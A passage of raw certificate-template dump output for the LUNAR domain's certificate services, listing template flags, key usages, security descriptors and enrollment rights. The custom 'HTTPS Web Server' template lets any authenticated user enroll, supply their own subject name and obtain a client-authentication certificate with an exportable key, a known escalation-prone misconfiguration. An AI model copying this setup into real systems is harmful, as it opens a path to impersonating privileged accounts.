CONTROLLERSAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =4 Extensions:Extension[0]:1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2bCertificate Template InformationTemplate=Directory Email Replication(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.29)Major Version Number=115Minor Version Number=0Extension[1]:2.5.29.37: Flags = 0, Length = dEnhanced Key UsageDirectory Service Email Replication (1.3.6.1.4.1.311.21.19)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)Extension[3]:1.3.6.1.4.1.311.21.10: Flags = 0, Length = fApplication Policies[1]Application Certificate Policy:Policy Identifier=Directory Service Email ReplicationTemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[9]:TemplatePropCommonName = DomainControllerTemplatePropFriendlyName = Domain ControllerTemplatePropEKUs =2 ObjectIds:1.3.6.1.5.5.7.3.2 Client Authentication1.3.6.1.5.5.7.3.1 Server AuthenticationTemplatePropCryptoProviders =0: Microsoft RSA SChannel Cryptographic ProviderTemplatePropMajorRevision = 4TemplatePropDescription = Directory e-mail replicationTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.15TemplatePropEnrollmentFlags = 29 (41)CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1CT_FLAG_PUBLISH_TO_DS -- 8CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = 19000000 (419430400)CT_FLAG_SUBJECT_ALT_REQUIRE_DIRECTORY_GUID -- 1000000 (16777216)CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN -- 10000000 (268435456)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 1026c (66156)CT_FLAG_ADD_OBJ_GUID -- 4CT_FLAG_PUBLISH_TO_DS -- 8CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-498)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DD)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;ED)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Enterprise Read-only Domain ControllersAllow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Domain ControllersAllow Enroll LUNAR\Enterprise AdminsAllow Enroll NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 22Certificate Template Name (Certificate Type)DomainControllerExtension[1]:2.5.29.37: Flags = 0, Length = 16Enhanced Key UsageClient Authentication (1.3.6.1.5.5.7.3.2)Server Authentication (1.3.6.1.5.5.7.3.1)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)TemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[10]:TemplatePropCommonName = DomainControllerAuthenticationTemplatePropFriendlyName = Domain Controller AuthenticationTemplatePropEKUs =3 ObjectIds:1.3.6.1.5.5.7.3.2 Client Authentication1.3.6.1.5.5.7.3.1 Server Authentication1.3.6.1.4.1.311.20.2.2 Smart Card LogonTemplatePropCryptoProviders =0: Microsoft RSA SChannel Cryptographic ProviderTemplatePropMajorRevision = 6e (110)TemplatePropDescription = ComputerTemplatePropSchemaVersion = 2TemplatePropMinorRevision = 0TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.28 Domain Controller AuthenticationTemplatePropSupersede =0: DomainControllerTemplatePropV1ApplicationPolicy =3 ObjectIds:1.3.6.1.5.5.7.3.2 Client Authentication1.3.6.1.5.5.7.3.1 Server Authentication1.3.6.1.4.1.311.20.2.2 Smart Card LogonTemplatePropEnrollmentFlags = 20 (32)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = 8000000 (134217728)CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10060 (65632)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-498)(OA;;RPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;S-1-5-21-3330634377-1326264276-632209373-498)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DD)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(OA;;RPWPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;DD)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;ED)(OA;;RPWPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;ED)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Enterprise Read-only Domain ControllersAllow Auto-Enroll LUNAR\Enterprise Read-only Domain ControllersAllow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Domain ControllersAllow Enroll LUNAR\Enterprise AdminsAllow Auto-Enroll LUNAR\Domain ControllersAllow Enroll NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSAllow Auto-Enroll NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =4 Extensions:Extension[0]:1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2bCertificate Template InformationTemplate=Domain Controller Authentication(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.28)Major Version Number=110Minor Version Number=0Extension[1]:2.5.29.37: Flags = 0, Length = 22Enhanced Key UsageClient Authentication (1.3.6.1.5.5.7.3.2)Server Authentication (1.3.6.1.5.5.7.3.1)Smart Card Logon (1.3.6.1.4.1.311.20.2.2)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)Extension[3]:1.3.6.1.4.1.311.21.10: Flags = 0, Length = 28Application Policies[1]Application Certificate Policy:Policy Identifier=Client Authentication[2]Application Certificate Policy:Policy Identifier=Server Authentication[3]Application Certificate Policy:Policy Identifier=Smart Card LogonTemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[11]:TemplatePropCommonName = EFSRecoveryTemplatePropFriendlyName = EFS Recovery AgentTemplatePropEKUs =1 ObjectIds:1.3.6.1.4.1.311.10.3.4.1 File RecoveryTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.01: Microsoft Base Cryptographic Provider v1.0TemplatePropMajorRevision = 6TemplatePropDescription = UserTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.8TemplatePropEnrollmentFlags = 21 (33)CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = 82000000 (-2113929216)CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)TemplatePropPrivateKeyFlags = 10 (16)CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10230 (66096)CT_FLAG_EXPORTABLE_KEY -- 10 (16)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 18Certificate Template Name (Certificate Type)EFSRecoveryExtension[1]:2.5.29.37: Flags = 0, Length = fEnhanced Key UsageFile Recovery (1.3.6.1.4.1.311.10.3.4.1)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageKey Encipherment (20)TemplatePropValidityPeriod = 5 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[12]:TemplatePropCommonName = EnrollmentAgentTemplatePropFriendlyName = Enrollment AgentTemplatePropEKUs =1 ObjectIds:1.3.6.1.4.1.311.20.2.1 Certificate Request AgentTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.01: Microsoft Base Cryptographic Provider v1.02: Microsoft Base DSS Cryptographic ProviderTemplatePropMajorRevision = 4TemplatePropDescription = UserTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.11TemplatePropEnrollmentFlags = 20 (32)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = 82000000 (-2113929216)CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10220 (66080)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 20Certificate Template Name (Certificate Type)EnrollmentAgentExtension[1]:2.5.29.37: Flags = 0, Length = eEnhanced Key UsageCertificate Request Agent (1.3.6.1.4.1.311.20.2.1)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature (80)TemplatePropValidityPeriod = 2 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[13]:TemplatePropCommonName = MachineEnrollmentAgentTemplatePropFriendlyName = Enrollment Agent (Computer)TemplatePropEKUs =1 ObjectIds:1.3.6.1.4.1.311.20.2.1 Certificate Request AgentTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.01: Microsoft Base Cryptographic Provider v1.02: Microsoft Base DSS Cryptographic ProviderTemplatePropMajorRevision = 5TemplatePropDescription = ComputerTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.13TemplatePropEnrollmentFlags = 20 (32)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = 18000000 (402653184)CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN -- 10000000 (268435456)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10260 (66144)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 2eCertificate Template Name (Certificate Type)MachineEnrollmentAgentExtension[1]:2.5.29.37: Flags = 0, Length = eEnhanced Key UsageCertificate Request Agent (1.3.6.1.4.1.311.20.2.1)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature (80)TemplatePropValidityPeriod = 2 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[14]:TemplatePropCommonName = EnrollmentAgentOfflineTemplatePropFriendlyName = Exchange Enrollment Agent (Offline request)TemplatePropEKUs =1 ObjectIds:1.3.6.1.4.1.311.20.2.1 Certificate Request AgentTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.01: Microsoft Base Cryptographic Provider v1.02: Microsoft Base DSS Cryptographic ProviderTemplatePropMajorRevision = 4TemplatePropDescription = UserTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.12TemplatePropEnrollmentFlags = 0TemplatePropSubjectNameFlags = 1CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10201 (66049)CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 2eCertificate Template Name (Certificate Type)EnrollmentAgentOfflineExtension[1]:2.5.29.37: Flags = 0, Length = eEnhanced Key UsageCertificate Request Agent (1.3.6.1.4.1.311.20.2.1)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature (80)TemplatePropValidityPeriod = 2 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[15]:TemplatePropCommonName = ExchangeUserSignatureTemplatePropFriendlyName = Exchange Signature OnlyTemplatePropEKUs =1 ObjectIds:1.3.6.1.5.5.7.3.4 Secure EmailTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.01: Microsoft Base Cryptographic Provider v1.02: Microsoft Base DSS Cryptographic ProviderTemplatePropMajorRevision = 6TemplatePropDescription = UserTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.24TemplatePropEnrollmentFlags = 0TemplatePropSubjectNameFlags = 1CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10201 (66049)CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 2cCertificate Template Name (Certificate Type)ExchangeUserSignatureExtension[1]:2.5.29.37: Flags = 0, Length = cEnhanced Key UsageSecure Email (1.3.6.1.5.5.7.3.4)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature (80)TemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[16]:TemplatePropCommonName = ExchangeUserTemplatePropFriendlyName = Exchange UserTemplatePropEKUs =1 ObjectIds:1.3.6.1.5.5.7.3.4 Secure EmailTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.01: Microsoft Base Cryptographic Provider v1.0TemplatePropMajorRevision = 7TemplatePropDescription = UserTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.23TemplatePropEnrollmentFlags = 1CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1TemplatePropSubjectNameFlags = 1CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1TemplatePropPrivateKeyFlags = 10 (16)CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10211 (66065)CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1CT_FLAG_EXPORTABLE_KEY -- 10 (16)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 1aCertificate Template Name (Certificate Type)ExchangeUserExtension[1]:2.5.29.37: Flags = 0, Length = cEnhanced Key UsageSecure Email (1.3.6.1.5.5.7.3.4)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageKey Encipherment (20)TemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[17]:TemplatePropCommonName = HTTPSWebServerTemplatePropFriendlyName = HTTPS Web ServerTemplatePropEKUs =1 ObjectIds:1.3.6.1.5.5.7.3.2 Client AuthenticationTemplatePropCryptoProviders =0: Microsoft RSA SChannel Cryptographic Provider1: Microsoft DH SChannel Cryptographic ProviderTemplatePropMajorRevision = 64 (100)TemplatePropDescription = ComputerTemplatePropSchemaVersion = 2TemplatePropMinorRevision = d (13)TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.8824417.6496437 HTTPS Web ServerTemplatePropV1ApplicationPolicy =1 ObjectIds:1.3.6.1.5.5.7.3.2 Client AuthenticationTemplatePropEnrollmentFlags = 8CT_FLAG_PUBLISH_TO_DS -- 8TemplatePropSubjectNameFlags = 1CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1TemplatePropPrivateKeyFlags = 5050010 (84213776)CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_WINBLUE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 50000 (327680)TEMPLATE_CLIENT_VER_WINBLUE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 5000000 (83886080)TemplatePropGeneralFlags = 20241 (131649)CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_MODIFIED -- 20000 (131072)TemplatePropSecurityDescriptor = O:LAG:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(OA;;CR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;AU)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;LA)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Enroll NT AUTHORITY\Authenticated UsersAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Full Control LUNAR\AdministratorAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =4 Extensions:Extension[0]:1.3.6.1.4.1.311.21.7: Flags = 0, Length = 31Certificate Template InformationTemplate=HTTPS Web Server(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.8824417.6496437)Major Version Number=100Minor Version Number=13Extension[1]:2.5.29.37: Flags = 0, Length = cEnhanced Key UsageClient Authentication (1.3.6.1.5.5.7.3.2)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)Extension[3]:1.3.6.1.4.1.311.21.10: Flags = 0, Length = eApplication Policies[1]Application Certificate Policy:Policy Identifier=Client AuthenticationTemplatePropValidityPeriod = 2 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[18]:TemplatePropCommonName = IPSECIntermediateOnlineTemplatePropFriendlyName = IPSecTemplatePropEKUs =1 ObjectIds:1.3.6.1.5.5.8.2.2 IP security IKE intermediateTemplatePropCryptoProviders =0: Microsoft RSA SChannel Cryptographic ProviderTemplatePropMajorRevision = 8TemplatePropDescription = ComputerTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.19TemplatePropEnrollmentFlags = 20 (32)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = 18000000 (402653184)CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN -- 10000000 (268435456)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 